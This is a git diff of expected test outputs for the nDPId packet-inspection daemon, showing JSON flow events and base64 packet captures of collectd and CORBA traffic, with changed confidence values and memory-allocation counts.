02226{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1655315734133,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1376,"pkt_l4_len":1342,"thread_ts_msec":1655315734133,"pkt":"AAAAAAAAAAAAAAAACABFAAVSgypAAEARtG5\/AAABfwAAAY\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\/lAAgADBiqh0WIf9wOAAMABjMAAAYADwABAgAAAAAABI1BAAgADBiqh0WIgAgcAAMABjEAAAUACXdhaXQAAAYADwABAgAAAAAAAEPAAAgADBiqh0WIgBAPAAMABjIAAAYADwABAgAAAAAAAEdRAAgADBiqh0WIf+U8AAMABjAAAAYADwABAgAAAAAAAEPlAAgADBiqh0WIf0BEAAMABjMAAAUACXVzZXIAAAYADwABAgAAAAAAFfl+AAgADBiqh0WIgBZ8AAUACXdhaXQAAAYADwABAgAAAAAAAD55AAgADBiqh0WIgBzpAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAmAAgADBiqh0WIgEZ6AAMABjIAAAYADwABAgAAAAAAAAArAAgADBiqh0WIgFc\/AAMABjAAAAUADmludGVycnVwdAAABgAPAAECAAAAAAABD\/MACAAMGKqHRYiAgLMAAwAGMgAABgAPAAECAAAAAAAA0OMACAAMGKqHRYh\/gyQAAwAGMAAABQALc3lzdGVtAAAGAA8AAQIAAAAAAASq\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"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315734133,"flow_last_seen":1655315734133,"flow_idle_time":200000,"flow_min_l4_payload_len":1334,"flow_max_l4_payload_len":1334,"flow_tot_l4_payload_len":1334,"flow_avg_l4_payload_len":1334,"midstream":0,"thread_ts_msec":1655315734133,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315734133,"flow_last_seen":1655315734133,"flow_idle_time":200000,"flow_min_l4_payload_len":1334,"flow_max_l4_payload_len":1334,"flow_tot_l4_payload_len":1334,"flow_avg_l4_payload_len":1334,"midstream":0,"thread_ts_msec":1655315734133,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 02203{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1655315744133,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1362,"pkt_l4_len":1328,"thread_ts_msec":1655315744133,"pkt":"AAAAAAAAAAAAAAAACABFAAVEhDdAAEARs29\/AAABfwAAAY\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\/nGIAAwAGMgAABQAJdXNlcgAABgAPAAECAAAAAAAUGgQACAAMGKqHSAiBZ\/8AAwAGMQAABQAMc29mdGlycQAABgAPAAECAAAAAAAAdBwACAAMGKqHSAiAzz8AAwAGMgAABQAJd2FpdAAABgAPAAECAAAAAAAAR1UACAAMGKqHSAiBe7cAAwAGMwAABQAMc29mdGlycQAABgAPAAECAAAAAAAAOuwACAAMGKqHSAiBhSgAAwAGMAAABQAKc3RlYWwAAAYADwABAgAAAAAAAAAA"} 
02212{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1655315754132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1368,"pkt_l4_len":1334,"thread_ts_msec":1655315754132,"pkt":"AAAAAAAAAAAAAAAACABFAAVKil5AAEARrUJ\/AAABfwAAAY\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\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\/NZwADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKtmAAgADBiqh0qIgA6xAAMABjEAAAYADwABAgAAAAAABKpXAAgADBiqh0qIgBbKAAMABjIAAAYADwABAgAAAAAABKBGAAgADBiqh0qIgB0cAAMABjMAAAYADwABAgAAAAAABI2rAAgADBiqh0qIgCfPAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAEPsAAgADBiqh0qIgC9\/AAMABjEAAAYADwABAgAAAAAAAEPBAAgADBiqh0qIgDfpAAMABjIAAAYADwABAgAAAAAAAEdVAAgADBiqh0qIgD96AAMABjMAAAYADwABAgAAAAAAAD6AAAgADBiqh0qIgEcAAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAm"} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":70,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":70,"packets-processed":69,"total-skipped-flows":0,"total-l4-payload-len":90410,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":5,"total-detection-updates":0,"total-updates":3,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":1655315824133} 
-00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":76,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1655315313991,"flow_last_seen":1655315720484,"flow_idle_time":200000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":63954,"flow_avg_l4_payload_len":1305,"midstream":0,"thread_ts_msec":1655315864132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":76,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1655315313991,"flow_last_seen":1655315720484,"flow_idle_time":200000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":63954,"flow_avg_l4_payload_len":1305,"midstream":0,"thread_ts_msec":1655315864132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655316151465,"flow_last_seen":1655316151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655316151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02293{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1655316151465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":1655316151465,"pkt":"AAAAAAAAAAAAAAAACABFAAVysRJAAAERFprAqLIj78BKQpqYZOIFXrI+AhAFVgAEdXNlcsEiWwf\/ecmHq20KMKY60TNgWTifxhUWZCzzOonut\/nBLF1H9\/qjrU5R7\/H5O\/9DCfuI7YKK9r+lg3rOUKcDtnx6k3gtNCOgHQsqM7rGW+eN33S1hv\/QWiqJh22vfUfr7Wz7pYGKApBiZvpQtTEhc5hAetf3FPDtHKTWmaIAv9tpMJ\/C1iMPcZFdIsr2dDPokYbKhkO7YK1VgRFBm2eTLctpolFTqtNDbNm7ZZj+J4aMD2mZJnGIwYcXGtrkRXSRyBums+W0\/jz8zVPv3F9mqHBPDINnDWvpLDLobIdObIJno8I9jJWIUvexsFajL\/Ozn6gm5h5Bbary3bFaI1eTK9\/2PtGLDA75C4TnHGlqTybsnLPrgfJgwREyLUHKyyjysSqq3nmcDjg2jxv7jB\/7C1x4ERVxqcLGWKVSyPtJGgd833gDOhBdG4xbUSAQLAZ93ZhNhqDYpSH1iLu4WeSFrvXELH+6cym0Y6TgPbHb995Xd4eeznstGpKVPXUMBMYKyolrAJf5IhADYmfwsVbHYwmMY4b+7dLe8Xm4J6pnNHkCQ8D8q\/xlIjpnUrS9OVed\/2DlDBS1QStbE\/5D9qtP1vKoQWi7aNQljNk4LIQq71gjvpOQoYs5A2fU7jqs5Cj7g1YVzvRN1szG+q0InctAJFWNqveI4E4VlH\/arcTeRtG6STEypPhnpvREi8Y1HMoKqCoQ2XNXh6LreKH8j13m7n5IUINrWLGczoOvwh46DPuvBo2KGeZrJslABigBIDcj82i9s8gLnjLw9\/JZ2x7gkouGNhGSwI6E+HHJlTbRNuUsv\/6rZpEcDEihG4n3z7Vt80LO+ANJQ1PEO96u3kHeqsvkky84XapbdS3hpG\/ZxbNSNY8nK4OCSOQQ8HmKfoJVs6uDOBd\/wp2958CwlilWA+S7vIiQ1XgDMWkpnLBj0SxBkzaVjTocJQTqqyWTwe3IhhIJv81ISkko8HlqeLw6ucXInaAjACXZe+tWeEVUOeFlwkGIIzC1N4S0VtZ61SexhHWzr\/i9+G9ZKKsehcu3XJBgh1f60wB6VdfrKhuC5O+DjSawaWC4SpBpu+HXc5ivM+uiz5tYgYFHvZZNAX520+pU7SYW1nlm8z8\/p7hrSy4or4XEkX6alUhb2dPGHzFD8JaAiNPkifbtDixhZdVcES3WwpR0Ee8a2+96wN6EZWNgwUs7rB2p7yVJHR76cDlQ4Kn2ZsRDtijNF38f24MQDLxP4V3sCe2kxcWUIAwjR6dboGGToHbd4gC7kvh\/FM9CeCXw8edRrjHiX4wnTLxVl9Tka0gXAevnElxIQ6DbX8f3r7039o6XRuqpxn0ACZ1UjAWdNP5AnrGPEDhQYcbCL1rrIoiDXNbcbYfPGBMR0rENIqKDB4er0OJ0AMEmws1dKMgg8kdYXjcu2lTLVY4\/4d9fGNXECu0E+IBVi1I\/a05N27robtMnHhQS3RLkMgdw2UHSJmRpgA2AeN7d5fzdRb1cndtHczkpZ4DqnETqYT245MmiMyz
hppvI8TfDhCd1ynjvTf\/tCkooHN2LdiiRy3Nwel6jnMS4sDovy8cCEn9qicofWJUG7y5a\/VIh54v0RwEEnumWw\/ZdPXVhbMfahFcQa0uAqmRQ+1dUag87w7YOq0bDC6ojsLdQ0XEWCC562cwnsSkgbZ5fTl3ZKIGjfA5C2IbcoLoeLIRL87MyrjfoqdSbenCEN1JHvCKm8MwRfUxtBnRG6JvCJKg82EHDqygdxWBY5xyz+WlvhZcsZvu\/jKGESQRQiW2wuv9DlwnzHiLS\/qJ\/XT4Fpxe9+g=="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655316151465,"flow_last_seen":1655316151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655316151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655316151465,"flow_last_seen":1655316151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655316151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1655316161464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1421,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1421,"pkt_l4_len":1387,"thread_ts_msec":1655316161464,"pkt":"AAAAAAAAAAAAAAAACABFAAV\/vHhAAAERCyfAqLIj78BKQpqYZOIFa7JLAhAFYwAEdXNlcoHTTu4jDT4spb1CiaNx+5RTDn8Im\/b94mza+2Tq7cMtskMUVXsMv7dZrJRMmMzbyIK4\/km4yyqNNo6Poo9ByCjRVFMTyyPT\/UT2wKYuzh4+P0AJOUuUlATRprrQzSelw1AlOIvvmScBLdJq7WdxmPSnFa+zKFXMmGiPwTbEIhRIPKuq6S\/J\/VyKO3TxoPwnfcaDGc1KsY1GQLAh8sJqmpR0mYJfLV75vjpe4BcGt05Cnd+IWZgAztagytrBIM67+fRSi+NiaoAAQpWqyiuvWgY+CLskTaKtEF8h9wSZvnYkCvPPKR0QSE7G+pK5ES0eFNWa+1eDOmZkEDc1i9Wj7VXdjo5fJEx2\/3IiiB5UNUGTEeK4mBP6SjM7aEQIBDgv6yGncYgbJv8lkxADwb4mixhSUEWeYIubY\/sjGLQuw+fno\/2V+FW3Or9qBqHt+jO2vbYAxL9De0l+X3mnWnnx9LA9D+EoBhRdQDAU8SwAPcO1nZKxtFVQEmYy4Ev5LD0cRTFUaFM\/TT1FIeO5lYZFNMEjbS0KR0At8kgASX4oE7iy0XJ62uujxcsFMzYaO+OeOclbqIYffC2RUQoXHJqger6nAAImbXnsl0Yu4PPBMgM1eSPtDbfOvyzkhWVDpQqFL0LaOIEfpgSggVDv\/dRk429TrRIFmsQNebxtKbgHn4Xilk2CHRzWTnQD8KPkFiM7RqUaeUcryC+E6juG7jhKTS2dMrdCP03tVnzDWmFRMXGxeDwPJof0pZKwYTbHyjtsI3L9tcxhKGsoD783Ic7IKBLSuy7jdJS1fuIal+iS4AA86NKOIbIz0ec024giNvfBZ575HrChKJmkSP9+nn1UgAEiXNDvy+17p0soQ2LGYrQl0sDFFpGPCX2EXfF25UFPEuMufWJFRn3lIoFaiX7jBeJ5U56cCUIYcD694Kx8BdhTqml2kv7AfwspY+rpzfse8SABjZl8CmbZDe5pG\/2\/G4uMvHE6tBlZKUmIs8c79lUh\/pCUYntjfiF+pjszE+pUzy7FY4DPb+vEcK0xgXO5+0tqMWWVfPzZY8scxbejQR\/4RTVAAwFe3Ax5LD\/us75Xy9NPkHrAZmiG8gUerFYEHE\/M9i5uXtZyc2a08fzqQI\/Eao\/ha4UWXeCRPgKFAupttiZJlo5JGqa8vqGgJPEfEyyylaxzkrdOaUFGxae\/cVO6WvuneM3yJBdYJ8msDBdSJFHRYHjw2OQiK9UbaMSIfdvz7Awe7E2DL\/XyeMKXUeNTlmmM5gyC+pdg1dgvm84WqRyGkpSOQCYFN65RDtXyAefYnqxgbi0O6SqvI17JBkSRrDCeLoSL3NEDK3WWVZ2PcO7jpMhUMF56E\/+HC8STbZE7RMrn2q1cgV+GXyL4ibIgw52TOUUs7qd05Gz\/mi9lHH\/cjJwlNio31+o7dkfGyGyrqz7wUjQZLJq3XWe8CW7UizPU3BncynHVyPZq3+200q8BC+YvCmkLGpGrzc0\/+RWrT+5baFlh\/eIx8nfYhIaDYZFes
VK5X4LKsKg6crpIT1EXpf4GdAV277Djc7GYAc9NdQYCDpZfWmEPzTeHXX4IaFXJkBSvrKgylFjgJ\/YrCXjYVM\/7o19QhFgWiV+dbHO8pjEOtvj8B1GsTi\/BKa2wXNb+8mOW9Dh\/9YmdegyUenEoJ4bzIVQ\/5DFAjYNOMTX7CIWFcQV32FgTHjBJ2gFgj22S7oAUJPSo7Vz\/NPjvKSTYKGiPpAiOVtKpLbeA60g7lfqjHStCz9vEIFJC15nxTsveOnho3UiCyRNSbUJKU1ATcf3IBYMl9FCC1+2GCqtOZW0NY1ovxgU="} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1655315313991,"flow_last_seen":1655315720484,"flow_idle_time":200000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":63954,"flow_avg_l4_payload_len":1305,"midstream":0,"thread_ts_msec":1655316161464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655315734133,"flow_last_seen":1655315868800,"flow_idle_time":200000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1342,"flow_tot_l4_payload_len":22041,"flow_avg_l4_payload_len":1296,"midstream":0,"thread_ts_msec":1655316161464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1655315313991,"flow_last_seen":1655315720484,"flow_idle_time":200000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":63954,"flow_avg_l4_payload_len":1305,"midstream":0,"thread_ts_msec":1655316161464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655315734133,"flow_last_seen":1655315868800,"flow_idle_time":200000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1342,"flow_tot_l4_payload_len":22041,"flow_avg_l4_payload_len":1296,"midstream":0,"thread_ts_msec":1655316161464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
02320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1655316171464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1434,"pkt_l4_len":1400,"thread_ts_msec":1655316171464,"pkt":"AAAAAAAAAAAAAAAACABFAAWMwzhAAAERBFrAqLIj78BKQpqYZOIFeLJYAhAFcAAEdXNlcid4w6halbvXS613MX5H51i+nDzaEWkA1VmugP8ABM5xryT\/nH\/vwU2Taojp1kKL2hrGHv0CQBfbLyDZQIw25R5Y7WOAHgQ6IMdV2Q15UvYZZHiZdFDb7AXtZjCHYww\/pZtLpAofcLVJnk+RyLZSqcqADyQ2f46Ho0jVLCz8ioU9SFecatQnEdr43X\/5Al5RG9CIVCm7hvP2jE7HDrP8HsnKwC7MkWWO+h8NZIHYs88z00xAsYnVZJ6iUya5W4VoShVoESpu9tOpgEENAy0y1\/T2ebTBJ8GVq\/9m8TbLNKq9enpKxMosHCvUiEUcsdJF9\/NgXCv425Qb9McHLBVRtkvQ5K5ZuFFub2yn+Muu7vyFIbrl8KnCKB0O0BcJI0E4Ml8gSEuYZi4lHgF64H2JqiFhuQlqEjOR7vcXoE9fITH7IeQHixZ6ByxHOc9cMOLUC1JQmVQqJaSOGLnKxLq9tvIl16Rl\/4TFskTLim1On\/MQ0m0CnBfUvs54FBGtig6jvjePsw5LH5BsN3aQN0ydNYkSxm1BPTHyMbQtIJWT6jw+L0uz1DvQpjzc4RcX7o12T9yXPGTmO7W6BnWLgiIHFmK8TkO5nxY8G89PFe9hR9WrmdFFiLtVQPVJf7ENe6zHG\/2H33iJTJ4WLBh6gAGpUQbmckVksY2eXX7NHoIQFh96dAEzI5Uq7lAAysra8IeGHGeVTOuX0qXUANkBV9MvnXi2Sv1xFNTDS+l+qYURumUgEy9IWQnpwd0YDFPMVMaNE6a4WWC+WR25LgETzjPKh2N4X2C4vH+Sj81sRqfQW4fEJz2SbwyiM4LNTvfzllFIOcETpkT0PNrUJhZ9RkbZcrFuhK5GPnAOOlI93\/6Dy6gL6LHfz0ha2rGej\/yfvsGmiVdtT48gm+maRs\/4BmXetTEhuj1sevyAPjnjkpKPJKIUT26r7UHHLP4ueFCDDP421Dntl\/szsHpYKetXMWMWV6wcodHYjVNSZUoWGtdu7pg06SV69wiC2hi9IfHv8aS2ycQ1KaD3OGcp0uUksh8BkimCFB1hYWbRTUEqzpum0AmXV7qAZtZwDPK+fg8FmayZWTSqSORiCbSXPn3datjeA\/S8P0qOYJvvSK\/Jqnh5OXXe7UJ4+ReS\/Tp5APmi3t2Gf31eqGua0fKEuDgc44bhVUUUGFdftYdcyXnQ0YzAlbdvM3u5hNkJ3Ch+CQaEndN47jNTzhOTvEga6AZ2zgQ4Dyf4GFQPNAw4JGDbYs308hjGafMwkPR8Z9FKuhJ6GoJLzKZV8ys+pcCFLPJbEJHig27gbbKD7ZFre\/nk6mMszf98vHdBDrzqHFjjeEPXz3ejznu8ifYD42gc1YANDtPsgnGU3hA+MSbcLdHUiCGAPF33svO+jzSd6GTY9ejDa2G1BXZw9nTi35b3aYqiH19hqz8yJ7WMPfCBkW4bv9XCKQagsLDMEva9cko3kdccurIqJCjTRDc6SjjtO+4iqLDhC3EKdFmxHpDCfelDkdDcNb1knb4u0aodpInw+
qBRqH6L+FOsszUtJ16pCENKJDAG5yRgdTAF\/YSkTW82VRXU8\/985HVLLLM4Zaq1NMYpaN8OogkG7TxqnhPgIY57Fi9+jhIxuy1V1kkomKSycuZXc9ZEAuNCSDWdCaoLSkFZOVx6OEaSJvmSK02QT9RA8ytnVXVgmOqcsgeg9tJprKYtXmF3nYrOqgdi8PX\/bMaAdxzzgX410QIdeFWu\/81QoVE7NTemALBRfg0W0\/HHCndMie3SK3O5RE5HSjup\/JzXQWL5spu8mQXoIPO\/+8d0nrCpsULdDch57rECCbIrYvNQvEneLQwoMVDV"} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":81,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655316151465,"flow_last_seen":1655316182371,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1392,"flow_tot_l4_payload_len":6745,"flow_avg_l4_payload_len":1349,"midstream":0,"thread_ts_msec":1655316182371,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":81,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655316151465,"flow_last_seen":1655316182371,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1392,"flow_tot_l4_payload_len":6745,"flow_avg_l4_payload_len":1349,"midstream":0,"thread_ts_msec":1655316182371,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":81,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":81,"packets-processed":81,"total-skipped-flows":0,"total-l4-payload-len":105984,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":6,"total-detection-updates":0,"total-updates":4,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1655316182371} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 81/81 @@ -60,9 +60,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880188 bytes -~~ total memory freed........: 5880188 bytes -~~ total allocations/frees...: 118224/118224 +~~ total memory allocated....: 6013822 bytes +~~ total memory freed........: 6013822 bytes +~~ total allocations/frees...: 120986/120986 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2325 chars diff --git a/test/results/corba.pcap.out b/test/results/corba.pcap.out index 9f97eceae..a3534793b 100644 --- a/test/results/corba.pcap.out +++ b/test/results/corba.pcap.out 
@@ -4,20 +4,20 @@ 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614768020789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020789,"pkt":"5kBKB+riApXG95NLCABFAAAwnOsAAIAGAAAKZQACCmYAAiIWA4SwjQfnAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614768020790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020790,"pkt":"ApXG95NL5kBKB+riCABFAAAwnN4AAH8GihsKZgACCmUAAgOEIhawjRxgsI0H6HASgAFEQgAAAgQFtAMDAQA="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614768020790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020790,"pkt":"5kBKB+riApXG95NLCABFAAAonOwAAIAGAAAKZQACCmYAAiIWA4SwjQfosI0cYVAQgAEU6QAAAAAAAAAA"} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": 
